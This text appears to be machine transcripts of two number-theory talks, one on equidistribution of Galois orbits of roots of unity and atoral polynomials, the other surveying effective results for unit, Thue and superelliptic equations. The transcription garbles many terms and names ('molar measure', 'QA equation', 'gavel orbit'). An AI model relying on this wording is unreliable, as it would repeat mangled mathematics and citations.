the difference of k over n minus 1.5 if the left-hand side is non-zero. So whatever happens here in this logarithm is not going to be too small because this here is bounded from below by 1 over 2n, they're actually precisely, and so the n will appear here and log n is then negligible with respect to 5n because as we've seen before it grows almost linearly. So this case is slightly bad, but it's not really bad. The really bad case is the next one where alpha is on the unit circle like this one here, but it's not a root of unity. So e to the 3 plus 4i over 5 lies on the unit circle, it's an algebraic number, but it's not a root of unity. So the trick I just explained before does not work, and here you need linear forms in logarithms, the baker's linear forms in logs in their proof. So that kind of splits this case off from the other two cases, so this case is much deeper than these two cases here, this case is classical, the second case is fairly straightforward and this uses deep tools in transcendence theory. Okay, the three important cases we'll see later on when we move to higher dimensional results. Okay, so let me first reformulate their theorem, so it's the same theorem as before in a slightly more general dressing. So s1 to set up some notation for my talk will be the unit circle, it has a hard measure. The infinity will be the roots of unity in the complex plane, and sigma will always denote an element in the Galois group of a psychotomic field, so which is classically isomorphic to this unit group here. So their theorem can be reformulated as saying if I take any polynomial with algebraic coefficients, p nonzero, then the average of the Galois orbit of the root of unity over log, so the test function here is log absolute value of p will converge to the integral as the order of the root of unity tends to infinity. So this follows directly from the statement I mentioned further up just because a polynomial always factors into linear terms. Now this integral here on the right has a nice interpretation, this is just the molar measure of a polynomial. So there's a Jensen's formula allows you to compute the molar measure without computing an integral, it's just given by the expression here, you take the log of the reading term and then you add the log of all roots of the polynomial that lie outside of the absolute values, logs of the absolute values of the roots that lie outside the unit circle. So this is the molar measure of a polynomial. So this is just a reformulation of the result that was on the previous slide using the molar measure, so this would be the molar measure of p. Let me continue. So what I want to talk about today, my talk is what happens in higher dimension. So higher dimension I just mean instead of looking at a single root of unity, I'm looking at a couple of roots of unity here, zeta 1 to zeta d and each of them has an order, we can find a common denominator n and so the whole tuple has an order and we're going to say that the order is n. I'm going to use a boldface zeta here to denote something in higher dimension and being of order n is the same thing as saying that the GCD of these exponents here together with one, with n is one. And computing the Galois orbits of such a point here, we can look at the Galois conjugates of this point, it's essentially the same thing. We look at powers of this tuple where the exponent is co-prime to n. Now the first thing that you see that is in higher dimension, just having the order go to infinity is not enough to have equity distribution because things can happen here that don't happen in dimension one. For example, I'm just I'm going to write this down here, take the sequence zeta zeta where zeta is a root of unity of order n. And this tuple here will also have order n, but it's clearly not equidistributed on S1 cross S1. So what is not so the Galois orbit is not equidistributed on torus as the order goes to infinity because both entries are the same. So that's something that can happen in higher dimension. You can also have something different like you have a square here. You have some power here and the same non-equidistribution holds. So you have to be a bit more careful in higher dimension, but the only thing you have to make after you worry about is if there are some relations among these coordinates that are pathologically small. So instead of the order, it's more reasonable to look at the following quantity, namely we're looking this in a sense generalizes the order in different direction, higher dimension. We look at for any given tuple, we look at the smallest non-trivial character that contains our tuple, whose kernel contains our tuple, right? We're just taking the least non-zero vector b in integral coefficients, so such that zeta to the b is equal to one and where this notation is quite useful. So instead of using a tuple to an integral tuple, it's just this character notation. So this turns out to be the more appropriate invariant than the order when looking at questions of equidistribution in higher dimension. So the classical fact or result, which is stated here, is that now if we have a test function on the d-dimensional torus, s1 to the d, that is continuous, then so there's a typo here. The gavel orbit, the average of f along the gavel orbit will converge to the integral of f on the unit on this torus and here we just have the product or measure. But the convergent tools as this invariant delta of zeta goes to infinity. So having the order go to infinity is not enough, but for delta going to infinity, that's okay. So let me also state that delta of n of zeta is always at most the order, right? Because if I take zeta to the nth power, I get one, so I can, for the nnnnn is a non-trivial character whose kernel contains zeta. So the delta invariant of zeta is always at most n. But of course, it can be much smaller than it. Okay, so what is the conjecture that we have for logarithmic singularities? So let's look at this test function here, given by coming from a polynomial with algebraic coefficients. The test function is then just for a tuple, we take log of absolute value of p evaluated at this tuple. And so the conjecture is, our conjecture is that if you average over this test function, you'll converge to the integral over log of the absolute value of p as this delta invariant here goes to infinity. Now here are a few words, here are a few comments are in order. First of all, this here is the higher dimensional molar measure of a polynomial in t variables instead of 1. So this integral, even though the function here is not everywhere well defined on the torus, perhaps this integral converges in as well defined. Here there's also a question of whether this sum here is actually well defined or not. It's a more serious question than in the one dimensional case, because the vanishing locus of p on the torus can be more than a single point or a finite set of points. You can be, some will see that later on, it could be something of dimension greater than zero. To show that this average is actually well defined, you have to show that for delta of zeta large enough, this Galois conjugate here will not be on the vanishing locus of p. And that follows from result of Michel Laurent, which is also a case of the money monford conjecture for the multiplicative for the algebraic torus. So actually even showing that this average here is well defined for delta of zeta large enough is a theorem. So that's the conjecture, the conjecture is open, and I want to report on some progress towards this conjecture. In the case v equals one, the conjecture is known by the result of Matt Baker, E, and Rommelie. So what kind of evidence do we have towards this conjecture in dimension greater than one? So we have a result by Gary Meyerson from the 1980s and then slightly extended by Bill Duke in 2007 for the following form. So here we're looking at roots of unity of prime order. So zeta will be a root of unity of prime order. And the tuple we're looking at here is the following form. We look at zeta, zeta to the A, zeta to the B. The whole packet has order p. And A and B are, well, they're only defined modulo p, which is good enough for us because zeta is a root of unity of order p. And A and B are the non-trivial elements in the unique subgroup of order 3 in the multiplicative group fp. And this, of course, requires us to suppose p is equivalent to 1 mod 3. Then there is a unique subgroup of order 3 in fp star. Take that group, we take the two non-trivial elements, and then we look at this tuple. What we average, we average the test function along this tuple here, along this sum. So the polynomial here is t plus t1 plus t2 plus t3. So it's, okay, it's in dimension 3, I guess, but you can reduce it to something in dimension 2 if you'd like. And by de-homogenizing, and the test function here is just logarithm of absolute value of p. So the limit here, so p minus 1 is just the order of the number of roots of unity of order p. And so the theorem was that this average converges to the molar measure, just as predicted by the conjecture, plus some error term that goes to 0. And delta here can be computed of this tuple. And this is actually even a more precise way of stating convergence here, that the difference goes to 0 as p goes to infinity in this way here. And let me just say, and I'm using fact about this molar measure, it was computed by Chris Smith to be equal to the value of the derivative of a certain L function at the point minus 1. So this value here can be approximated numerically, and let me see, it's a positive real number. Let me stop here, so this is some evidence towards the conjecture in dimension greater than 1. And so as next point, I want to state a result for a class of polynomials in d variables for which we know the conjecture is true. And for that, I need to introduce a notion of a toral polynomials. So a toral polynomials appear in the literature, I guess they appeared in work of Agar McCarthy-Stankus in 2006, and later in slightly different form in work of Lynch-Smith and Verbitsky. And we will introduce yet another variant of what it means for a polynomial to be a toral. And these three definitions are not completely equivalent, they are in but in similar spirit, I would say. We chose a definition that's more adapted to our method, or best suited for our method. So let's start out with any polynomial in t variables, and complex coefficients, and we're going to look at its zero set, not on the fine d dimensional space, but we're going to look at the zero set on the torus, the d dimensional torus. So these are just the points where the complex absolute value is 1. So this is a set, it's not complex algebraic because the unit circle is certainly not complex algebraic, but it's a real algebraic subset of c to the d. I'll show you some pictures later on how something like this can look like. And now the, of course, important feature that we have in the complex plane is that we can complex conjugate, and if we're on the unit circle, the complex conjugate of a point is just its inverse, right? So if we have a solution of this equation here, and if I take the complex conjugate of the whole packet, I'll be inverting here the coordinates because they're on the unit circle, and I'll get a complex conjugate here in the polynomial p. So we get actually, we get a second relation for any point here in this zero set, and this second relation may or may not be independent of the first relation. So of course, if, for example, p is symmetric with regard to real coefficients, and it's symmetric with regard to this inverting operation up to a monomial coefficient, then this will not give us a new relation. But sometimes you'll get a new relation, and generically you would expect this to happen. And by new relation, I mean that we get a second polynomial that is coprime to the first one up to a monomial. Then we'll say that that's a situation we can deal with. So the precise definition of a torals as follows, we say that the polynomial p is a toral if there exists coprime polynomials, r and s. So r and s are allowed to have complex coefficients again. Or if we're working over some smaller field, then we'll ask the coefficients to be in the smaller field. Coprime, so they induce different relations, and we want the common set of zeros of the set of zeros of p on the detours to be contained in the common zeros of r and s. That's what we want. So if, for example, these two guys here, these two relations are honestly independent, then we can create polynomials out of these two guys. In general, they may not be, and there may be other polynomials, r and s, that are coprime such that a is contained in the common zeros of r and s. So this actually happens to be equivalent to saying that the dimension of a, so remember a is a real algebraic set, is at most d minus 2. So a is real algebraic, it has a real, there's a concept of dimension of real algebraic sets, and it's certainly something of dimension, at most d minus 1, because p is nonzero as a polynomial, so it's at most d minus 1. But if it's d minus 2, then that's the atoral case. In a sense, being of dimension d minus 2 is the generic situation, because if you look at it from the real algebraic point of view, these are actually two conditions, namely the real and the imaginary part of p vanish at the point z1 to zd, and so generically you're removing two dimensions from d. But in general, there can be polynomials that are not atoral, and I'll show you an example in a moment. So in dimension d equals 1, being atoral just means that the polynomial does not vanish on the unit circle. If there are two polynomials, co-prime, in one variable, then they will not have any common roots, and so this set here will be empty. D equals 1. For d equals 2, what is the common set of zeros of two co-prime polynomials in two-nit variables? That's a finite set, and so for d equals 2, being atoral just means that this set here, a, is finite. That's what it means for d equals 2. And for larger d, it's not so straightforward how to formulate that, but for example, this linear polynomial t1 plus t2, et cetera, plus td is atoral because you can cook up two co-prime polynomials from using this kind of relation here. So not all polynomials are atoral, even in d equals 2, or for d equals 1, there's obviously cases in d equals 2. You can look, for example, at Blaschke products, and I've prepared a picture or a small image. I hope you can see this. I've switched to a browser. I hope there's no problem with screen sharing at this time. So this is an example of a polynomial that you can construct using a Blaschke product. It's called as a form 2xy minus x minus y plus 2, and this blue torus here corresponds to the two-dimensional torus, s1 cross s1, and the intersection of the complex roots of this two-variable polynomial with s1 cross s1 is represented by this red line here. So this red line or this red curve would be something of real dimension 1, and so this is not an atoral polynomial. So this is something that's difficult. We'll see that this will be difficult to treat with our methods. So I'm returning to my notes. I hope there hasn't been a problem. Okay. Let me continue. So let me say something about what is known in this atoral setup. So this is using the definition. This is a result by Lin-Schmidt and Verbitsky using their definition of atoral, which is slightly different from ours, but which in this special case, I think, corresponds to ours, at least for irreducible polynomials. They show that if we average over this test function here, then in the limit we get the Mahler measure, right? We're not averaging over Galois orbits, but over finite subgroups of this torus here, this multiplicative group to the d. And they also have a notion of delta of g. This is just to mean that the points of this finite subgroup equidistribute in the classical sense as we run along this sequence. So they have convergence for finite subgroups under the atoral condition. So again, if the polynomial does not vanish at all on the torus, then convergence follows from the classical results because then our test function is continuous. And there was a previous result by the same three authors from 2010 under the condition that the vanishing locus of the polynomial on the d torus is finite. Now remember, atoral is weaker. That just means essentially that the vanishing locus is of real dimension at most d minus 2. So starting from dimension 3, this is a stronger condition than being atoral. And finally, Dimitrov and his PhD thesis, 2017, he dropped the hypothesis on p, so there's no atoral hypothesis, but he allowed only subgroups of this type. So the entorsion groups of the groups of unity. All right. So what is our result here? So we're back to the Galois orbit setting. This is joint work with Vessel and Dimitrov. And so we have an atoral polynomial. So with the same hypothesis as in work of Lynch and Verbitsky, but we're averaging over the Galois orbit as opposed to finite subgroups. And so we get the limit here equals the molar measure of p if, again, under the assumption that the Galois orbit actually becomes equidistributed in the limit. Just a few remarks. So we get a rate of convergence that is a polynomial with a small exponent in 1 over delta. And we have a slightly weaker condition on atoral. Actually, it's something that we call essentially atoral. And I can explain that to you in a short, in this short picture. Remember the one-dimensional case, there were these three situations. So this was somehow the trivial one where the function is. The function is actually continuous on S1. Then we have the case where the pole, there's a small fault, wrong picture here. So this is actually, this should be a singularity here. There is a case where there's a pole at a root of unity, which was somewhat easy to treat. And then there was a case where there's a pole at a non-root of unity. And this required Baker's linear forms and logarithms, or at least some quads, a version of it. So in the higher-dimensional case, we can have poles on the detourists. But the poles set is not allowed to be too bad. So it's at most of real-dimension D minus 1. So this is somehow the atoral case. We can also treat this case where the pole set is large of dimension D minus 1, but it comes from essentially an algebraic subgroup, like here minus 1 is an irreducible component of an algebraic subgroup. This is a case that is conjectural. The general case that in the non-dimensional setting requires Baker's linear forms and logarithms is at the moment open in higher dimensions. So this is what further ideas are needed. And also a small point, we don't need to really work with this Galois, or we can also replace Q by a number field. All right. Let me give you an example of what there's a nice application of these equidistribution results. Let's look at this polynomial, T1, T2 plus T3 plus T4, and this happens to be atoral. Let me just look at these two guys. You invert it, and then their coprime is Laurent polynomials, and then you get the two relations R and S. Also a nice feature that the molar measure here of P has been computed to this value. It's also, this is related to the zeta function. The actual value will not play a role for this work, but what's important is that it's positive. That will play a role. Okay, so let's say we have four roots of unity, zeta 1 to zeta 4, such that their sum is an algebraic unit. You'll find examples like this if you look. So you can take, for example, e to the 2 pi i over 6, e to the minus 2 pi i over 6, and then two general roots of unity from minus here, then the sum will be exactly 1. So there are examples where this is an algebraic unit. What happens in that case? Well we can apply the theorem. The theorem tells us that the average here will converge to the molar measure as delta goes to infinity. But if I'm a unit, then this average here is just the logarithm of the absolute value of the field norm, and so this will be zero. Right. And then of course we've got a problem. As I said, this is a positive value here, this smaller measure, and so something zero cannot converge to something positive when both things are constant. So that means that delta of zeta has to be bounded. So it's a certain finite result. So as a conclusion, if zeta 1 plus zeta 2 plus zeta 3 plus zeta 4 is an algebraic unit for some four roots of unity zeta 1 to zeta 4, then there has to be a multiplicative relation between these four roots of unity where the exponents are bounded by some constant b. And here the relation is clear. I mean there are many relations. So for example, you can take zeta 1 to the 6 equals 1 here in this particular instance. And there are other relations, zeta 1 times zeta 2 is more than so on. So this is a certain kind of finite result. You can get out of equidistribution statements like this connected to a conjecture of Su Yong Yi, which was also a motivation in the work of Baker, Ian Rumley. Okay, let me say a few things about the proof of our theorem in the last, I think, 10 minutes. So let's go back to the univariate variable case. So if we just have a polynomial in one variable, let's see what we can get there. So the proposition that we need to prove or that we prove in our paper is a following. So we're back to the one variable case. Later on we're going to try to reduce to the one variable case. We take an average over a gaol orbit of unity, plug it into our Q, and proposition says that in the limit, this is the molar measure of Q. And the point of this proposition is that we get an explicit error estimate here, which is explicit in all the data. Now there is an important hypothesis here. Namely, this is just the atoral hypothesis in dimension one. As you recall, being an atoral in dimension one means I'm not zero on the unit circle. So this is where the atoralness comes into the picture. And let me give you an idea how the proof works. So the proof is rather straightforward here. We can assume that Q is just linear by factoring the polynomial. And then what does the average look like? Well, there are contributions to the average that are harmless, namely those conjugates that are away from any pole here, any pole of this, that are not too close to alpha. So there are actually no poles here, but still alpha could be very close to the unit circle. So you want to sum over first those conjugates of zeta that are not too close to alpha. So being not too close is being polynomially bounded away here, one over n squared as a placeholder. And then there is a remaining term here of the bad guys, the guys we have to deal with later on. Now, because the proximity here is one over n squared, and these are roots of unity of order n, there can be at most one term here in this sum here. So there's a most one bad guy. And the rest, phi of n minus one guys we can handle. And using just the standard equidistribution techniques, this part of the sum here converges rather nicely to what you would expect, namely the molar measure of this univariate polynomial, which is this log of max one come of absolute value. So this sub part of the sum is harmless. What we need to deal with is this part here. And as I said, there's only one term here, but this one term can cause a lot of problems. Because even if alpha is not on the unit circle, we have to deal with the contingency that zeta or some conjugate of it is extremely close to alpha. And we'll spoil here this absolute value. And so this could be very negative in principle, at least, we have to deal with that. Okay, so what is the worst case scenario is when our average is log of max one comma. So this is the molar measure here, plus some pathologically negative term that comes from a conjugate that is extremely close to alpha. And then I'm not going to specify the error term here that comes from this one here. So recall that this sigma, this exceptional conjugate is just of the four meters of the two pi iq for some rational number q. And it's tempting to apply Baker's linear forms and logarithms at this point, just like in the work of Baker and Romney. Because we're dealing here with, if you look at the log of this, this would be two pi iq and the log of this would be the logarithm algebraic number. If these two guys are closed, and so the logs will also be, or choices of logs will also be, so it's an idea to apply Baker's linear forms and logarithms. But this was already observed by Duke in his work in 2007, that the current versions of even the state of the art of Baker's, even the two variable results, the dependency in the field of definition here of alpha is not good enough to get a result here. So the dependency of the field of definition is usually d cubed or something like that, and that will not, won't be able to dominate this, this denominator here. So that, that unfortunately doesn't work. So we have to do something else. And what we do is actually something, it's almost a sacrilege. So we have to bound, the thing to do is we have to bound this from below, right? And so what is the first thing you learn at university? Well, the first thing is probably the triangle inequality, and then there's a reverse triangle inequality if you just go the other way. But of course you pay a high price for that. And usually this price is much too high in any context, in any applications in numbers theory. But actually in this setting, it turns out to be good enough. So, so we bound the different, the distance between zeta sigma and alpha from below just by the distance of alpha to the unit circle. Yeah, this is may seem like a blunder, but it actually happens to work in this situation. And why does it work? Well, if alpha, the situation that we're interested in is if alpha is extremely close to the unit circle, and if alpha is extremely close to the unit circle, then the distance between alpha and the unit circle is roughly the distance between alpha and its complex conjugate inverse. So if alpha were precisely on the unit circle, then alpha to the minus one complex conjugate would be precisely equal to alpha. But they're, they're reasonably close to one another. So now remember alpha is not on the unit circle by hypothesis. No roots of qr are the unit circle. So this happens to be positive, which is already a good sign. We get a lower bound by something positive, but we need something a bit stronger. And for this, we return, we return to the tomorrow results on separation of roots of polynomials. So this is a result of model from 1964 five to distinct roots of a polynomial with here and future coefficients. Then I can, I can bound the distance between these two roots from below by something that is essentially linear in the degree. And with a dependency on the molar measure of F. And so if you plug in this result, you can, you can use this polynomial here with that has alpha and alpha. And it's the minus one is roots and you can bound this difference here from below. And the lower bound you get will be good enough for the application because it depends to here in D is essentially linear. And that will lead to an essentially linear dependency here in D. And the end, the five and we'll win. So for our result, we actually have to deal with different alphas because we have a product or polynomial is a product of linear terms as usual. And so we need a result like molar, but where we compare pairs of roots, like a separation result of pairs of roots. And so for this, there's a result of menyalt that strengthened molar result to pair to several pairs of roots, not just one. So we get a lower bound for several pairs of the same quality as more. So that kind of will give us something of this nature for the univari case. And then we have to go to the, we have to reduce from the, the multivariate case to the univariate case. So now let's assume that P is a toro. And we have a tuple of order n and of roots of unity. And so we can, we can reduce to the univariate case just by the basic observation that any tuple of roots of unity of order n is essentially generated. The coordinates are generated by a single root of unity of order n. So I can write this zeta, bold zeta as non-bold zeta to the, to some exponent a, which, which is a vector. And for Galois conjugates, I can do the same thing. And I also have some, some degree of freedom here because I can always add a vector, a multiple of n, because if n is the order of zeta, then that won't matter. So using this freedom, I can construct a polynomial starting from P using this exponent here. And the game is then to choose this exponent, choose tau and, and, and be in such a way that this exponent is as small as possible. Right. So this is going to be a polynomial of small as possible degree. And, but it will be univariate polynomial. So we can try to apply the proposition before to this univariate polynomial. The point, of course, the average doesn't change by doing this, this, this process. So we can reduce to the univariate case. The pay price we pay is that the degree of this queue here will be very large. That's why I was very concerned about getting good dependency in the degree in the last univariate case. So using Erdos-Turon-Coxma, we can get a bound for like an optimal choice here of this exponent, which will decay depending on this delta of zeta. Right. So we get, we get some improvement over the trivial bound, some power of delta. And then we plug in, we plug in the proposition, and then, well, at least if this delta here grows quickly enough, then the error term will be smaller one, which is what we want. Right. So if this delta here grows like n or some small power of n, then we get convergence here. So let me just, let me just briefly subsum what we have here. So if this delta of zeta grows quickly and often n is like some small power, then we get a convergence result. The molar measure here is again the molar measure of something univariate. So we have to, as a next step, we have to compare this with the molar measure of p, the original polynomial. And for that, we need a result of lots, or at least some, a variant of the result of lot that allows us to reduce the computation of multivariate molar measure to univariate molar measure. And there's a quantitative version of this that we show. We have to deal with this situation where delta does not grow quickly. And the first, the final thing is that we have to deal with the situation where q vanishes on the unit circle. Remember that was an important hypothesis in the proposition. Without this hypothesis, our method doesn't work. So we have to make sure that the polynomial q we constructed does not vanish on the unit circle. And just let me say a few words on that. So if q happens to vanish on the unit circle, that's where the atoral condition comes into the picture. If q vanishes on the unit circle, then we'll find a point on the detourus and on the vanishing locus of p of this nature here. And now we use that our polynomial is atoral. So this will be actually contained in the vanishing locus of two coprene polynomials, r and s. And then using a result of Bombieri-Massourenzanie, we can get a nice bound here on something orthogonal to this expression here. So this here uses a result of Bombieri-Massourenzanie and unlikely intersections. And let me just go to the final slide. So what happens if this nc is orthogonal to the exponent, well, then I just take, I can take c as an exponent in zeta and I get one. And that means that the delta of zeta is at most b. So that means if I have a root of, I have a point on the unit circle that's contained on the vanishing locus of my q, that means the delta of zeta is bounded. And that will mean that the proof is over because we can assume that delta of zeta is as large as one. Let me conclude by showing two or three pictures. Here this is what happens if this is a typical atoral polynomial intersected with detourus, this red point. It's a single point. The yellow line is the algebraic subgroup here that appears in Bombieri-Massourenzanie. We can make it a bit more complicated. Now it's x times y squared. And even more complicated, you see that some people always misses this point, this random point. Of course, it could also hit the random, the point in some cases, but the theorem tells us of Bombieri-Massourenzanie that this is somewhat rare and we can deal with this situation. Okay. So here, to close off, here's a picture of Lumini from Mont-Puget, who is marking the background three years ago. So I hope to return to Lumini soon. Thanks for your attention. Yeah, so thank you very much for the recent, very interesting lecture and for this nice picture from Puget. Maybe you know there is a fast track to go down just right off this place. You took the picture, which is a really very nice round tour of about three hours from the Institute. Yeah, it's a pity that we cannot do that. So we have still some time for very fast questions. Are there questions, comments? Yeah, there is a question. Can you read it, Philipp? Fabia? Fabia, I think you can hear the notion of atoral and the notion of tempered from Denninger. No, I've not. I'm not aware of tempered, but I'd like to look into that if there's a connection. Okay. Denninger is all interested in smaller measures. I'm back again.
|
Roots of unity of order dividing $n$ equidistribute around the unit circle as $n$ tends to infinity. With some extraeffort the same can be shown when restricting to roots of unity of exact order $n$. Equidistribution is measured by comparing the average of a continuous test function evaluated at these roots of unity with the integral over the complex unit circle. Baker, Ih, and Rumely extended this to test function with logarithmic singularities of the form $\log|P|$ where $P$ is a univariate polynomial in algebraic coefficients. I will discuss joint work with Vesselin Dimitrov where we allow $P$ to come from a class of a multivariate polynomials, extending a result of Lind, Schmidt, and Verbitskiy. Our method draws from earlier work of Duke.
|
10.5446/53725 (DOI)
|
Let me start with a short introduction. There is an extremely rich literature of finiteness results. Of finiteness results for different inequations over number fields and more generally over finite generated domains that is over domains of this form where we assume that a contains that and the generators are algebraic or transcendental elements over Q. Important example are when a is z or the ring of integer of number field or S integer polynomial bearing over Z and so on. If you want to get finiteness theorem it is necessary to assume that the grand domain is finitely generated over Z otherwise you cannot get such a result. In the first survey part of my talk I shall make a mention to the most important results on it. Most of the final results are ineffective that is don't provide any algorithm for finding the solutions. The most powerful method to get ineffective finiteness theorem is the two easy garage with method. There are also effective finiteness results over number fields which make it possible at least in principle to determine the solutions. The most powerful method is Baker's method concerning linear forms in logarithms. There is also effective results over function fields due to Mason and others. In this case you cannot get finiteness only bounds for the highs of the solutions. In my talk I shall speak about the extension of effective finiteness results over number fields to the finitely generated case. Such a program was initiated in the 80s in two papers of mine. The main idea is the following, reduce the equation over finitely generated domains to the number field case and the function field case by an effective specialization and then use effective results over number fields and function fields. This method was applied to Q equations, the composable form equations and discriminant equations over a restricted class of finitely generated domains. In 2013 we refined Bidey-Werze my method and combined it with the result of Assem-Brenner from effective commutative algebra to establish a method for arbitrary finite generated domains. We applied this to unit equations over finitely generated domains. Later further applications of the general method were given to other classical equations including Q equations, sub-religious equations, Schindsel-Teidemann equations by Biedzsche-Ebertsch and myself. To generalize unit equation by Biedzsche, the catalan equation by Koimans, discriminant equation and the composable form equation recently by Ewertsche. These results have a great number of applications. In my talk first I shall speak about and give a brief historical overview and in the second part I shall present some new general effective results on the composable form equations over finitely generated domains. These results are joined with Ewertsche. Let me start with unit equations. Let A, B, S above that is a finite generated domain which can contain transcendental elements too and A, B, C element, non-zero element of A consider this equation where A star denotes the unit group of A that is the multiplicative group of invertible elements. It is known that this is finite generated. The first effective finite, sorry, the first ineffective finitely result over a number of fields was proved by Ziegler almost 100 years ago in an implicit way. Later Mahler obtained a similar result over this ring. Perry extended this result to the case when the grand ring is the ring of assentatures in a number field. And finally, Lang in 1960 proved this theorem, this finite theorem in full generality. The third generative effective finitely result with explicit one were obtained in these papers in the 70s. It should be remembered that independently String Duke, Koto, Trellina obtained similar, but slightly less general result and with less explicit constant. An equation of this form where the solution belongs to S units of a number field is called an S unit equations. Trial upper band have been obtained for the bonds. And I should mention here the result of Bizu and myself, Bizu and you and myself and live food. The best know bond in terms of S was obtained last year. The equation has many application. The proof are based on Baker's method and its periodic version, there are also some alternative effective methods due to Bombieri and Bombieri and Cohen over number fields and Merthien-Pastens on Kahnel, Machke, Siksej, Bennett and other over Z. Generalization for Finance-Ingenerated Domains Let again A, B, S, and O with quotient field K and consider again this unit equation. Then we can choose from the set of generators a subset Z1 ZQ which is maximal algebraically independent subset. Denoted by A0 this ring it is in fact a polynomial ring. One can show that there is an element g in A0 and an element w in k star which is integral over A0 such that this relation holds. In fact this can be done in an effective way. We say that A is effectively given if Q and the minimal polynomials of Z, Z, Q plus 1 and some Z are over K and R given. In this case g and w and hence B can be determined. It should be mentioned here that later you will see that it is more convenient to consider this unit equation in a larger ring, B, which is again Financially generated. That is the unit group is also Financially generated but it is easier to deal with this over ring of A. From my results one can deduce the following. Consider now this unit equation over B. Then it follows that this has only finitely many solutions in B star and hence in A star as well. Further if these parameters are effectively given then the solutions of this equation can be effectively determined. A quantitative version was also given with this bound for the size of the solution where the size will be defined later. The description of the method would be rather complicated and long and I shall mention here only the basic idea of the method. The first step is to reduce the equation to the function for the number field case and in the number field case one can apply many effective ring homomorphism that is specialization to obtain the result requested. Here any u in Z to the Q here is a ring homomorphism from here to here by substituting u, i for z, i for i equals 1 to Q. This map can be extended through a ring homomorphism from B to Q bar which sends this equation to an S unit equation in a number field which depends on u. The second step is to use effective results over number fields and function fields to get an algorithm for solving this unit equation. The method works for b itself for polynomial rings over z and across the further finance generated domains of this form. In general it was a problem in the time that no general algorithm was known to select those solutions from B star for which x and y belongs to A star. A generalization for the arbitrary finance generated case this was made by Evertse. In what follows another representation for A will be given the put R equals z x1 and so on that is the polynomial ring consider the ideal of this polynomial for which this holds. In that case A is isomorphic to R divided by i and i is finance generated. By definition in this representation we shall say that A is effectively given if a set of generators of i is given say f1, ft. An element alpha of capital A we denote by A tilde a representative of alpha if alpha equals alpha tilde z1 zr. Of course every element has infinitely many representative and we say that alpha is given effectively if we have an a representative of alpha. Consider again the original unit equation in A star. We prove with Evertse the following theorem if A and ABC in A are effectively given then the solution of this equation U can be effectively determined. As was mentioned above the method of proof consists of refining and combining the method with the following theorem of Aschendrenner from cumulative algebra. Let G1 and so on element of this polynomial ring assume that this equation is solvable in R. If G1 and so on are given then this equation has an effectively computable solution in R. In fact we gave in fact Aschendrenner gave a quantitative version of this result. From this theorem combining with all results one can get an algorithm for deciding whether solution x, y and b star are contained in A star or not. We proved also a quantitative version of theorem b. To state this we have to introduce the so-called size of elements. For an element alpha in R the degree of alpha is the total degree of alpha is a polynomial and the logarithmic height of alpha is the logarithm of the maximum absolute value of its coefficients. Then the size of alpha is defined as the maximum of this quantity. Of course there are only finitely many alpha in this polynomial ring with bounded size and all them can be at least in principle determined effectively. The quantitative version of theorem b. Assume that in A R is at least one otherwise it is trivial. Let A tilde and so on be representative for A, B, C in R. Assume that F1 and so on and A tilde and so on all have degree at most A and logarithmic height at most H. Then for each solution x, y of this unit equation there are representative x, x prime x tilde, x prime tilde and so on of x, x minus one such that this inequality holds where C1 is effectively computable absolute constant. It is easy to deduce from theorem b what the finite is result theorem b. It should be mentioned that here you can see there are double exponential. The quantitative version of Ashen-Brenner theorem is responsive for this using Baker's method only one exponential would be needed. Two equation. The following classical equation are two equations. Let again A and K be as above. Consider binary form in x and y with coefficients in A such that F has no multiplicative factor. Then this is called a QA equation. The first very important result was obtained by QA in 1990 overset and that's why this equation is called after QA equation. This result was generalized by many people in an ineffective way and finally Lang proved this in 1960 that for arbitrary finitely generated domain this equation the QA equation has only finitely many solution. In fact, Lang deduced this theorem as a consequence or special case from this more general result this is a more general version of Ziegler's theorem from 1929. Ziegler proved for the case when K is an unbefilled and Lang extended this to the case when K is an arbitrary finitely generated field that if they have a polynomial which is absolutely irreducible such that the affine curve this one is of James at least one then this curve has only finitely many points which coordinates in A. From this one can deduce this finiteness result for QA equations. Effective finiteness results. The first effective result overset was obtained by Baker using his famous method he did write X with the top verb for the solution of QA equation overset. This was extended by Cots to this case and later Cotwen-Springjuck went further proving effective final result over the ring of integers of a number field. Several improvements have been obtained one can mention here the name of Feldman, Stark, Stringsjuck and so on. All this method all this proof based on different version of Baker's method. In 1983 this was extended to the so-called restricted classes of finite regenerative domains considered above. To state the general result we can say that if generators F1, Ft of i and idea and the representative a0 and so on are given then the solution X, Y of a of these two equations can be effectively determined. We proved the CRM together with Batesch and A-Welcher and gave an effective version. The proof was the method of A-Welcher and myself mentioned above. It is a major open problems to make effective the Siegel-Langht CRM first of course overset and then over A. This seems to be very very hard for the moment. Supra-aliptic equations consider a polynomial with coefficients in A. Assume that F has no multiple zero and consider this equation which is called supra-aliptic if M is at least three and hyperaliptic if M equals two. The first ineffective final result was also obtained by Siegel in 1926 over number fields and later Löweck gave a criterion a finance criterion over number fields. Langht deduced this final result over arbitrary finite regenerative domain from the general version of the Siegel-Langht CRM. Effective results. Baker was also the first to give an explicit upper bound for the solution of such an equation in the case when the ground ring is the classical ring, the ring of integer. This was extended by Sprinjub, Brinza and others to the number field case and Schenzschinck-Zellentheidehann proved that even M can be bounded above effectively if the parameters of the equation are given effectively. Brinza extended the result to the domains considered above in my result. We proved with Bieltsch and Evertzer in the same paper than the two equations that if A and the coefficients of the polynomial are effectively given, then this separative equation has only finitely many solutions and all of them can be effectively determined. We also gave an effective bound for M and formulated the quantitative, formulated and proved the quantitative version to. Generalized unit equation. Let again A and K be as above. Let F be a polynomial in X and Y with coefficients in A. Consider a finitely generated subgroup of K star which is, yeah, and assume that this condition holds, then consider this equation Fx, y equals 0 in units of A or more generally in gamma. We shall denote this by g, u. That is generalized unit equation. A length proved the following ineffective finalists result. This equation has only finitely many solutions in A star and more generally in gamma. Length contrasted that the same if it replaced gamma by gamma bar, that is denotes the division group of gamma which consists of element of this type. Liard later proved length conjecture in an ineffective form. Effective finalists results in number fields. First, Bumbierian-Gubler and later Birch-Evertzer and myself and then Birch-Evertzer-Pontraub and myself proved this result in an effective form in gamma, in gamma bar, in gamma bar, and so on. Finally, Bezsch in 2015 proved in full generative the following effective result. If A and G and gamma are finitely generated and A, gamma, and F are effectively given, then this equation, G, U, has only finitely many solutions and he gave it an effective quantitative version. Catalan equation. Let A be as above and consider the famous Catalan equation. Catalan conjectured in the classical case when A is Z that this is the only solution of this equation. Tideman proved the famous result by showing if A is the classical ring, the ring of integer, then this equation has only finitely many solutions and all of them can be at least in principle determined effectively. Unfortunately, the effective one was too large for practical use. The later Binza, Tideman, and myself extended this to the case when the grand ring is the ring of integer of a number field and brings the extent to the number field case when 